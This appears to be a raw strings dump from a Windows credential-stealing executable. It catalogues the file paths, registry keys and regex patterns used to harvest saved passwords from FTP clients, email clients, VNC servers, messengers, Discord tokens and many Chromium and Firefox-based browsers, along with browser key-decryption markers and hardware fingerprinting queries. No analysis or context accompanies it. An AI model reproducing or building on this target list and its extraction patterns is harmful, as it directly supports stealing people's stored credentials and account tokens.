PublicKeyFile
PortNumber
[PRIVATE KEY LOCATION: "{0}"]
ABCDEF
Flash FXP
\FlashFXP\
Sites.dat
quick.dat
yA36zA48dEhfrvghGRg57h5UlDv3
FTP Navigator
Server
SystemDrive
\FTP Navigator\Ftplist.txt
No Password
SmartFTP
SmartFTP\Client 2.0\Favorites\Quick Connect
WS_FTP
Ipswitch\WS_FTP\Sites\ws_ftp.ini
FtpCommander
\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
;Port=
;Password=
;User=
;Anonymous=
\VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\cftp\Ftplist.txt
\Program Files (x86)\FTP Commander\Ftplist.txt
\VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
;Server=
FTPGetter
<server>
\FTPGetter\servers.xml
<server_ip>
</server_ip>
<server_port>
</server_port>
<server_user_name>
</server_user_name>
<server_user_password>
</server_user_password>
The Bat!
\The Bat!
\Account.CFN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Becky!
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
DataDir
Folder.lst
\Mailbox.ini
Account
PassWd
SMTPServer
MailAddress
Outlook
9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\11.0\Outlook\Profiles
Software\Microsoft\Office\12.0\Outlook\Profiles
Software\Microsoft\Office\14.0\Outlook\Profiles
Software\Microsoft\Office\15.0\Outlook\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles
IMAP Password
POP3 Password
HTTP Password
SMTP Password
Server
Windows Mail App
Software\Microsoft\ActiveSync\Partners
syncpassword
mailoutgoing
COMPlus_legacyCorruptedStateExceptionsPolicy
FoxMail
HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Executable
HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
FoxmailPath
\Storage\
\VirtualStore\Program Files\Foxmail\mail
\VirtualStore\Program Files (x86)\Foxmail\mail
\Accounts\Account.rec0
\Account.stg
POP3Host
SMTPHost
IncomingServer
POP3Password
Opera Mail
\Opera Mail\Opera Mail\wand.dat
opera:
ijklmno
vwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
PocoMail
\Pocomail\accounts.ini
POPPass
SMTPPass
eM Client
eM Client\accounts.dat
Accounts
"Username":"
"Secret":"
72905C47-F4FD-4CF7-A489-4E8121A155BD
"ProviderName":"
o6806642kbM7c5
Mailbird
SenderIdentities
Server_Host
Username
EncryptedPassword
\Mailbird\Store\Store.db
TigerVNC
Software\TigerVNC\Server
TightVNC
Software\TightVNC\Server
RealVNC 4.x
SOFTWARE\RealVNC\WinVNC4
SOFTWARE\Wow6432Node\RealVNC\WinVNC4
TightVNC ControlPassword
ControlPassword
RealVNC 3.x
SOFTWARE\RealVNC\vncserver
PasswordViewOnly
Software\ORL\WinVNC3
UltraVNC
\uvnc bvba\UltraVNC\ultravnc.ini
passwd
passwd2
ProgramFiles
\UltraVNC\ultravnc.ini
JDownloader 2.0
JDownloader 2.0\cfg
org.jdownloader.settings.AccountSettings.accounts.ejs
jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Paltalk
Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
nickname
paltalk.com
Pidgin
\.purple\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Trillian
\Trillian\users\global\accounts.dat
trillian.im
MysqlWorkbench
\MySQL\Workbench\workbench_user_data.dat
Internet Downloader Manager
Software\DownloadManager\Passwords\
EncPassword
Discord
discord.com
Discord Token
[\w-]{24}\.[\w-]{6}\.[\w-]{27}
mfa\.[\w-]{84}
discordptb
discordcanary
Local Storage\leveldb
origin_url
username_value
Opera Stable
"encrypted_key":"(.*?)"
\Local State
\Login Data
\Default\Login Data
key4.db
metaData
nssPrivate
2a864886f70d0209
2a864886f70d010c050103
key3.db
global-salt
Version
password-check
Path=([A-z0-9\/\.\-]+)
[^\u0020-\u007F]
logins.json
\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
Host:
Application:
Password:
Username:
<br>Password:
<br><hr>
<br>Application:
<br>Username:
Firefox
\Mozilla\Firefox\
Chromium
Chromium\User Data
Liebao Browser
liebao\User Data
Coowon
Coowon\Coowon\User Data
Vivaldi
Vivaldi\User Data
7Star\7Star\User Data
PaleMoon
\Moonchild Productions\Pale Moon\
Orbitum
Orbitum\User Data
BlackHawk
\NETGATE Technologies\BlackHawk\
uCozMedia\Uran\User Data
CyberFox
\8pecxstudios\Cyberfox\
QIP Surf
QIP Surf\User Data
CentBrowser
CentBrowser\User Data
Postbox
\Postbox\
360 Browser
360Chrome\Chrome\User Data
Torch Browser
Torch\User Data
Chedot
Chedot\User Data
Chrome
Google\Chrome\User Data
Coccoc
CocCoc\Browser\User Data
Citrio
CatalinaGroup\Citrio\User Data
Elements Browser
Elements Browser\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Iridium Browser
Iridium\User Data
K-Meleon
\K-Meleon\
Opera Browser
Opera Software\Opera Stable
Cool Novo
MapleStudio\ChromePlus\User Data
SeaMonkey
\Mozilla\SeaMonkey\
BraveSoftware\Brave-Browser\User Data
Yandex Browser
Yandex\YandexBrowser\User Data
Amigo\User Data
Comodo Dragon
Comodo\Dragon\User Data
IceDragon
\Comodo\IceDragon\
Epic Privacy
Epic Privacy Browser\User Data
Sputnik
Sputnik\Sputnik\User Data
Kometa
Kometa\User Data
Edge Chromium
Microsoft\Edge\User Data
WaterFox
\Waterfox\
Thunderbird
\Thunderbird\
IceCat
\Mozilla\icecat\
00061561
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
SQLite format 3
UNIQUE
global-messages-db.sqlite
identities
OBJECTIDENTIFIER
SEQUENCE {
{0:X2}
OCTETSTRING
INTEGER
Windows Credential
{{{0}}}
chrome
policy
sha512
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
:Zone.Identifier
SELECT * FROM Win32_Processor
win32_processor
processorID
499bf1ad-5ae5-44e8-a0f9-476c98bd759f
Win32_NetworkAdapterConfiguration
IPEnabled
MacAddress
d0455ab7-ba51-490f-aeac-f9e460a035d0
Win32_BaseBoard
SerialNumber
b361a33b-acca-47d2-b73d-84a34b369284
FormatID: {0}
StorageSize: {0} (0x{0:X})
Version: 0x{0:X}
Size of the SerializedPropertyStore is less than {0} ({1})
Size of the SerializedPropertyStorage is less than 28 ({0})
Version is not equal to {0} ({1})
{D5CDD505-2E9C-101B-9397-08002B2CF9AE}
Value: {0}
Type: {0}
NameSize: {0} (0x{0:X})
ValueSize: {0} (0x{0:X})
Name: {0}
Size of the StringName is not equal to {0} ({1})
Size of the StringName is less than 9 ({0})
Size of the NameSize is not equal to {0} ({1})
ID: 0x{0:X}
Size of the SerializedPropertyStore is less than 8 ({0})
StoreSize: {0} (0x{0X})
\Device\LanmanRedirector\
Failed to retrieve system handle information.
Accounts
logins
sha512
credential
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
e6c7e90e-20ff-4cd0-a277-0023958459c3.exe
LegalCopyright
OriginalFilename
e6c7e90e-20ff-4cd0-a277-0023958459c3.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0